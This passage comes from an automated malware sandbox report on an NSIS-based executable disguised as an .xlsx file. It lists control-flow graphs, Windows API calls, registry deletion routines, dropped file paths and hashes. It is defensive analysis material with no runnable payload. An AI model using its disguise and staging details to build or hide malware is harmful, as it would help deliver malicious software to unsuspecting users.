                                                                            • GlobalAlloc.KERNELBASE(?,00409230), ref: 00402F7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 2803837635-2496236304
                                                                            • Opcode ID: 2c04d8be77adb3a6b73fa5f9521984b3b61a83da92e99188d87d195f815dd541
                                                                            • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                                            • Opcode Fuzzy Hash: 2c04d8be77adb3a6b73fa5f9521984b3b61a83da92e99188d87d195f815dd541
                                                                            • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 545 401752-401777 call 402b3a call 405a0a 550 401781-401793 call 405f48 call 405993 lstrcatW 545->550 551 401779-40177f call 405f48 545->551 557 401798-401799 call 4061dc 550->557 551->557 560 40179e-4017a2 557->560 561 4017a4-4017ae call 40628b 560->561 562 4017d5-4017d8 560->562 570 4017c0-4017d2 561->570 571 4017b0-4017be CompareFileTime 561->571 564 4017e0-4017fc call 405bb4 562->564 565 4017da-4017db call 405b8f 562->565 572 401870-401899 call 4051f2 call 403062 564->572 573 4017fe-401801 564->573 565->564 570->562 571->570 587 4018a1-4018ad SetFileTime 572->587 588 40189b-40189f 572->588 574 401852-40185c call 4051f2 573->574 575 401803-401841 call 405f48 * 2 call 405f6a call 405f48 call 405724 573->575 585 401865-40186b 574->585 575->560 608 401847-401848 575->608 589 4029d0 585->589 591 4018b3-4018be CloseHandle 587->591 588->587 588->591 592 4029d2-4029d6 589->592 594 4018c4-4018c7 591->594 595 4029c7-4029ca 591->595 597 4018c9-4018da call 405f6a lstrcatW 594->597 598 4018dc-4018df call 405f6a 594->598 595->589 603 4018e4-402243 call 405724 597->603 598->603 603->592 608->585 610 40184a-40184b 608->610 610->574
                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,?,00000031), ref: 00401793
                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,?,00000031), ref: 004017B8
                                                                              • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                              • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                              • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll), ref: 0040525F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nseDB62.tmp$C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling$Call
                                                                            • API String ID: 1941528284-15131886
                                                                            • Opcode ID: 0879d69bed4c8f472b86b9e85b84126f8f74c5a625f2fad1261ba299a3e5c0dd
                                                                            • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                                            • Opcode Fuzzy Hash: 0879d69bed4c8f472b86b9e85b84126f8f74c5a625f2fad1261ba299a3e5c0dd
                                                                            • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 611 4051f2-405207 612 40520d-40521e 611->612 613 4052be-4052c2 611->613 614 405220-405224 call 405f6a 612->614 615 405229-405235 lstrlenW 612->615 614->615 617 405252-405256 615->617 618 405237-405247 lstrlenW 615->618 620 405265-405269 617->620 621 405258-40525f SetWindowTextW 617->621 618->613 619 405249-40524d lstrcatW 618->619 619->617 622 40526b-4052ad SendMessageW * 3 620->622 623 4052af-4052b1 620->623 621->620 622->623 623->613 624 4052b3-4052b6 623->624 624->613
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                            • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                            • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                            • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll), ref: 0040525F
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll
                                                                            • API String ID: 2531174081-2415572159
                                                                            • Opcode ID: f10eb8b4edb837a623621e96def193046de5dd0ca1a8e17f40592997c05f4a34
                                                                            • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                                            • Opcode Fuzzy Hash: f10eb8b4edb837a623621e96def193046de5dd0ca1a8e17f40592997c05f4a34
                                                                            • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 625 402573-402588 call 402b1d 628 4029c7-4029ca 625->628 629 40258e-402595 625->629 630 4029d0-4029d6 628->630 631 402597 629->631 632 40259a-40259d 629->632 631->632 634 4025a3-4025b2 call 405ea8 632->634 635 4026e6-4026ee 632->635 634->635 638 4025b8 634->638 635->628 639 4025be-4025c2 638->639 640 402657-402667 call 405c37 639->640 641 4025c8-4025e3 ReadFile 639->641 640->635 648 402669 640->648 641->635 642 4025e9-4025ee 641->642 642->635 644 4025f4-402602 642->644 646 4026a2-4026ae call 405e8f 644->646 647 402608-40261a MultiByteToWideChar 644->647 646->630 647->648 650 40261c-40261f 647->650 651 40266c-40266f 648->651 653 402621-40262c 650->653 651->646 654 402671-402676 651->654 653->651 655 40262e-402653 SetFilePointer MultiByteToWideChar 653->655 656 4026b3-4026b7 654->656 657 402678-40267d 654->657 655->653 660 402655 655->660 658 4026d4-4026e0 SetFilePointer 656->658 659 4026b9-4026bd 656->659 657->656 661 40267f-402692 657->661 658->635 662 4026c5-4026d2 659->662 663 4026bf-4026c3 659->663 660->648 661->635 664 402694-40269a 661->664 662->635 663->658 663->662 664->639 665 4026a0 664->665 665->635
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F
                                                                              • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                                              • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                            • String ID: 9
                                                                            • API String ID: 1149667376-2366072709
                                                                            • Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                                            • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                                            • Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                                            • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 666 4015b9-4015cd call 402b3a call 405a3e 671 401614-401617 666->671 672 4015cf-4015eb call 4059c0 CreateDirectoryW 666->672 673 401646-402197 call 401423 671->673 674 401619-401638 call 401423 call 405f48 SetCurrentDirectoryW 671->674 681 40160a-401612 672->681 682 4015ed-4015f8 GetLastError 672->682 688 402793-40279a 673->688 689 4029c7-4029d6 673->689 674->689 691 40163e-401641 674->691 681->671 681->672 685 401607 682->685 686 4015fa-401605 GetFileAttributesW 682->686 685->681 686->681 686->685 688->689 691->689
                                                                            APIs
                                                                              • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405A4C
                                                                              • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                                              • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015E3
                                                                            • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 004015FD
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling,?,00000000,?), ref: 00401630
                                                                            Strings
                                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling, xrefs: 00401623
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling
                                                                            • API String ID: 3751793516-4070182260
                                                                            • Opcode ID: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                                            • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                                            • Opcode Fuzzy Hash: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                                            • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 693 402b7a-402ba3 RegOpenKeyExW 694 402ba5-402bb0 693->694 695 402c0e-402c12 693->695 696 402bcb-402bdb RegEnumKeyW 694->696 697 402bb2-402bb5 696->697 698 402bdd-402bef RegCloseKey call 4062b2 696->698 699 402c02-402c05 RegCloseKey 697->699 700 402bb7-402bc9 call 402b7a 697->700 706 402bf1-402c00 698->706 707 402c15-402c1b 698->707 704 402c0b-402c0d 699->704 700->696 700->698 704->695 706->695 707->704 708 402c1d-402c2b RegDeleteKeyW 707->708 708->704 709 402c2d 708->709 709->695
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Close$DeleteEnumOpen
                                                                            • String ID:
                                                                            • API String ID: 1912718029-0
                                                                            • Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                                            • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                                            • Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                                            • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 711 10001759-10001795 call 10001b18 715 100018a6-100018a8 711->715 716 1000179b-1000179f 711->716 717 100017a1-100017a7 call 10002286 716->717 718 100017a8-100017b5 call 100022d0 716->718 717->718 723 100017e5-100017ec 718->723 724 100017b7-100017bc 718->724 725 1000180c-10001810 723->725 726 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 723->726 727 100017d7-100017da 724->727 728 100017be-100017bf 724->728 729 10001812-1000184c call 100015b4 call 100024a9 725->729 730 1000184e-10001854 call 100024a9 725->730 751 10001855-10001859 726->751 727->723 731 100017dc-100017dd call 10002b5f 727->731 733 100017c1-100017c2 728->733 734 100017c7-100017c8 call 100028a4 728->734 729->751 730->751 744 100017e2 731->744 739 100017c4-100017c5 733->739 740 100017cf-100017d5 call 10002645 733->740 747 100017cd 734->747 739->723 739->734 750 100017e4 740->750 744->750 747->744 750->723 754 10001896-1000189d 751->754 755 1000185b-10001869 call 1000246c 751->755 754->715 757 1000189f-100018a0 GlobalFree 754->757 761 10001881-10001888 755->761 762 1000186b-1000186e 755->762 757->715 761->754 763 1000188a-10001895 call 1000153d 761->763 762->761 764 10001870-10001878 762->764 763->754 764->761 766 1000187a-1000187b FreeLibrary 764->766 766->761
                                                                            APIs
                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                            • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                              • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,00001020), ref: 100022B8
                                                                              • Part of subcall function 10002645: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                              • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                            • String ID:
                                                                            • API String ID: 1791698881-3916222277
                                                                            • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                            • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                            • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                            • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 768 405e15-405e47 RegOpenKeyExW 769 405e89-405e8c 768->769 770 405e49-405e68 RegQueryValueExW 768->770 771 405e76 770->771 772 405e6a-405e6e 770->772 774 405e79-405e83 RegCloseKey 771->774 773 405e70-405e74 772->773 772->774 773->771 773->774 774->769
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                                            • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Call
                                                                            • API String ID: 3677997916-1824292864
                                                                            • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                            • Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
                                                                            • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                            • Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 775 405be3-405bef 776 405bf0-405c24 GetTickCount GetTempFileNameW 775->776 777 405c33-405c35 776->777 778 405c26-405c28 776->778 780 405c2d-405c30 777->780 778->776 779 405c2a 778->779 779->780
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405C01
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
